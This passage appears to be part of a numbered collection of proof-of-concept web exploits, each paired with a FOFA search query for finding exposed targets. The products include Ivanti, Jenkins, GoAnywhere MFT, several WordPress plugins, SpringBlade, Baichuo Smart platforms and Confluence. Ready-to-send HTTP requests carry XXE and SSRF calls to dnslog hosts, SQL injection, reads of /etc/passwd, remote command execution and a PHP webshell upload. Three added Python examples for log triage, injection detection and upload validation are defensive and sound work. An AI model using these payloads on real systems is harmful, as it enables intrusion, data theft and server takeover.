POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response (the file contents come back inside the CLI's error text):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

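Items 95 to 110 above all hit a handful of fixed request paths, so the quickest risk check is to run web-server access logs against those paths. The script below is an added example for that triage, not code from the original post or from any of the affected products. It parses Combined Log Format lines, canonicalises the request target the way the application would route it (percent-decoding twice, dropping `;param` suffixes such as the `/xmlrpc;/` and `/..;/` tricks used above, collapsing `..`) and only then compares against the indicator table, so naive substring matching on the raw log line is not needed. The log lines, IP addresses and timestamps are constructed; the paths and CVE labels are the ones given on this page.

```python
"""Access-log triage for the request paths used by the RCE / file-read PoCs above."""
import posixpath
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# (label, canonical path prefix, query fragment that must also be present or None).
# Paths are taken from the PoCs above; labels are the CVE ids the page gives.
INDICATORS = (
    ("CVE-2023-49070 Apache OFBiz xmlrpc", "/webtools/control/xmlrpc", "requirePasswordChange=Y"),
    ("Apache OFBiz ProgramExport groovy RCE", "/webtools/control/ProgramExport", "requirePasswordChange=Y"),
    ("CVE-2024-0195 SpiderFlow function/save", "/function/save", None),
    ("CVE-2024-0305 Ncast busiFacade.php", "/classes/common/busiFacade.php", None),
    ("CVE-2024-21887 Ivanti keys-status", "/api/v1/license/keys-status", None),
    ("CVE-2024-21893 Ivanti saml20.ws", "/dana-ws/saml20.ws", None),
    ("CVE-2024-22024 Ivanti saml-sso.cgi", "/dana-na/auth/saml-sso.cgi", None),
    ("CVE-2024-23897 Jenkins CLI", "/cli", "remoting=false"),
    ("CVE-2024-0204 GoAnywhere InitialAccountSetup", "/goanywhere/wizard/InitialAccountSetup.xhtml", None),
)

# Constructed sample lines (not real traffic); the last one is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:07:41:00 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Jun/2024:07:41:01 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.6 - - [05/Jun/2024:07:42:10 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0 "-" "curl/8.0"
10.0.0.7 - - [05/Jun/2024:07:43:00 +0000] "POST /cli?remoting=false HTTP/1.1" 200 163 "-" "Java/17"
10.0.0.8 - - [05/Jun/2024:07:44:00 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2024:07:45:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def normalize_path(target: str) -> Tuple[str, str, bool]:
    """Return (canonical path, raw query, traversal_seen).

    Decodes percent-encoding twice (catches %252e), drops ';param' suffixes from
    every segment and collapses '..', so the compare sees the path the
    application will actually route."""
    parts = urlsplit(target)
    decoded = unquote(unquote(parts.path))
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    traversal = ".." in segments
    canonical = posixpath.normpath("/".join(segments)) if segments else "/"
    return canonical, parts.query, traversal


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that matches an indicator (any status code)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        canonical, query, traversal = normalize_path(m["target"])
        for label, prefix, marker in INDICATORS:
            on_path = canonical == prefix or canonical.startswith(prefix + "/")
            if on_path and (marker is None or marker in query):
                findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                                 "label": label, "path": canonical, "traversal": traversal})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["status"]} {hit["label"]} ({hit["path"]})')
```

A 403 on the Ivanti line still counts as a finding: an attempt that was blocked is exactly what an incident timeline needs. The `traversal` flag is reported separately because a `..` that survives into the canonical path is worth reviewing even when no indicator matches.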

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php.

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

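Items 105 to 107, 111, 112, 114, 117 and 119 are all the same two MySQL primitives, `sleep()` and `updatexml()`, delivered in different places: the query-string *name* rather than a value (106, 107), an `id[where]` array key (117), a JSON field (112), a form body (119), or percent-encoded with `+` for spaces (114). A request-side check that only looks at raw query values misses several of them. The Python below is an added example, not code from the page or from any of the affected products: it decodes both parameter names and values, flattens JSON bodies down to their string leaves, and reports which primitive was seen. The sample requests are constructed copies of the shapes used above plus one benign query that contains the word "sleep" without a call.

```python
"""Request-parameter inspection for the SQL-injection shapes used in the PoCs above."""
import json
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Signatures for the primitives the PoCs use (time-based and error-based MySQL).
SQLI_RULES = {
    "time-based sleep()": re.compile(r"\bsleep\s*\(", re.I),
    "error-based updatexml()/extractvalue()": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "subselect": re.compile(r"\bselect\b.{0,80}?\bfrom\b", re.I | re.S),
    "comment terminator": re.compile(r"--\s"),
}


def _flatten_json(node, prefix: str = "") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, string) for every string leaf so nested bodies are inspected too."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _flatten_json(value, f"{prefix}.{key}" if prefix else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _flatten_json(value, f"{prefix}[{i}]")
    elif isinstance(node, str):
        yield prefix, node


def _match(where: str, param: str, text: str) -> List[Dict[str, str]]:
    return [{"where": where, "param": param, "rule": rule}
            for rule, rx in SQLI_RULES.items() if rx.search(text)]


def inspect_request(target: str, body: str = "", content_type: str = "") -> List[Dict[str, str]]:
    """Inspect decoded query-string names AND values, plus a form or JSON body."""
    hits: List[Dict[str, str]] = []
    # parse_qsl percent-decodes and turns '+' into spaces, so 'SELECT+1+FROM' is seen as SQL.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits += _match("query-name", name, name)   # items 106/107 put the payload in the name
        hits += _match("query-value", name, value)
    if body:
        if "json" in content_type.lower():
            try:
                for path, text in _flatten_json(json.loads(body)):
                    hits += _match("json", path, text)
            except ValueError:
                hits += _match("body", "(unparsed)", body)
        else:
            for name, value in parse_qsl(body, keep_blank_values=True):
                hits += _match("form-name", name, name)
                hits += _match("form-value", name, value)
    return hits


# Constructed requests shaped like the PoCs above: (target, body, content type).
SAMPLE_REQUESTS = {
    "springblade dict-biz/list (#106)": (
        "/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1", "", ""),
    "html5 video player (#111)": (
        "/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-", "", ""),
    "notificationx (#112)": (
        "/wp-json/notificationx/v1/analytics",
        '{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}', "application/json"),
    "masterstudy (#114)": (
        "/?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+"
        "%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071", "", ""),
    "layerslider (#117)": (
        "/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+"
        "(SELECT(SLEEP(5)))nEiK)--+vqlq", "", ""),
    "baichuo sysmanageajax (#119)": (
        "/sysmanage/sysmanageajax.php",
        "src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1"
        "&value=test2|123456", "application/x-www-form-urlencoded"),
    "benign search": ("/search?q=sleep+quality+tips&page=2", "", ""),
}


def triage_all() -> Dict[str, List[str]]:
    """Map each sample request to the sorted set of rules it triggered."""
    return {label: sorted({h["rule"] for h in inspect_request(*req)})
            for label, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for label, rules in triage_all().items():
        print(f"{label}: {rules or 'clean'}")
```

The rules are deliberately narrow (a call, not a keyword) so that ordinary text such as "sleep quality tips" stays clean; what they buy is coverage of every location a parameter can arrive in, which is where the PoCs above differ from one another.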
120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

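Items 93, 94, 100, 116, 118 and 120 work because the upload handler trusts three client-controlled things: the filename extension, the declared Content-Type, and (in 118) a destination path. The validator below is an added example of the server-side checks that close those three gaps; it is not code from any of the affected products. It parses the multipart body, requires an allow-listed extension, confirms the first bytes match that type's magic number, and rejects any client-supplied destination that resolves outside the upload root. `UPLOAD_ROOT` is an assumed storage path, and the two request bodies are constructed for the example (the hostile one mirrors the shape of item 118 with a placeholder script body).

```python
"""Server-side validation for multipart file uploads."""
import posixpath
import re
from typing import Dict, List, Optional, Tuple

# Allowed extensions, each with the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
UPLOAD_ROOT = "/var/www/uploads"  # assumed storage root (hypothetical path)


def parse_multipart(body: bytes, boundary: str) -> List[Dict[str, object]]:
    """Minimal multipart/form-data parser: one dict per part (name, filename, content_type, data)."""
    delimiter = b"--" + boundary.encode("ascii")
    parts: List[Dict[str, object]] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter "--boundary--"
            break
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):             # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disposition = headers.get("content-disposition", "")
        name = re.search(r'(?<![\w-])name="([^"]*)"', disposition)
        filename = re.search(r'filename="([^"]*)"', disposition)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type"),
            "data": data,
        })
    return parts


def validate_upload(file_part: Dict[str, object], requested_path: Optional[str] = None) -> Tuple[bool, str]:
    """Decide whether a file part may be stored; returns (ok, reason or destination path)."""
    filename = str(file_part.get("filename") or "")
    base = posixpath.basename(filename.replace("\\", "/"))   # ignore client-supplied directories
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} is not on the allowlist"
    if not bytes(file_part["data"]).startswith(ALLOWED_TYPES[ext]):
        return False, "file content does not match the declared image type"
    if requested_path is not None:
        resolved = posixpath.normpath(posixpath.join(UPLOAD_ROOT, requested_path))
        if resolved != UPLOAD_ROOT and not resolved.startswith(UPLOAD_ROOT + "/"):
            return False, "client-supplied destination escapes the upload root"
    return True, posixpath.join(UPLOAD_ROOT, base)


def triage(body: bytes, boundary: str) -> Tuple[bool, str]:
    """Run the checks over a whole request body, honouring a txt_path field if one is present."""
    parts = parse_multipart(body, boundary)
    file_part = next((p for p in parts if p["filename"] is not None), None)
    if file_part is None:
        return False, "no file part in request"
    path_part = next((p for p in parts if p["name"] == "txt_path"), None)
    requested = bytes(path_part["data"]).decode("utf-8", "replace") if path_part else None
    return validate_upload(file_part, requested)


# Constructed hostile body shaped like item 118 (placeholder script content, not a webshell).
HOSTILE_BOUNDARY = "---------------------------13979701222747646634037182887"
HOSTILE_BODY = (
    b"-----------------------------13979701222747646634037182887\r\n"
    b'Content-Disposition: form-data; name="file_upload"; filename="contents.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<?php echo 'placeholder'; ?>\r\n"
    b"-----------------------------13979701222747646634037182887\r\n"
    b'Content-Disposition: form-data; name="txt_path"\r\n\r\n'
    b"/home/src.php\r\n"
    b"-----------------------------13979701222747646634037182887--\r\n"
)
# Constructed benign body: a real PNG header followed by filler bytes.
BENIGN_BOUNDARY = "----WebKitFormBoundaryexample"
BENIGN_BODY = (
    b"------WebKitFormBoundaryexample\r\n"
    b'Content-Disposition: form-data; name="file_upload"; filename="logo.png"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"\r\n"
    b"------WebKitFormBoundaryexample--\r\n"
)

if __name__ == "__main__":
    print(triage(HOSTILE_BODY, HOSTILE_BOUNDARY))
    print(triage(BENIGN_BODY, BENIGN_BOUNDARY))
```

The extension allowlist on its own is not enough (a double extension with a valid PNG header would pass it), which is why the stored name is reduced to a basename under a fixed root and why uploads should be served from a location where the web server does not execute scripts.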
121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter value c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded (encoded, not encrypted); decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
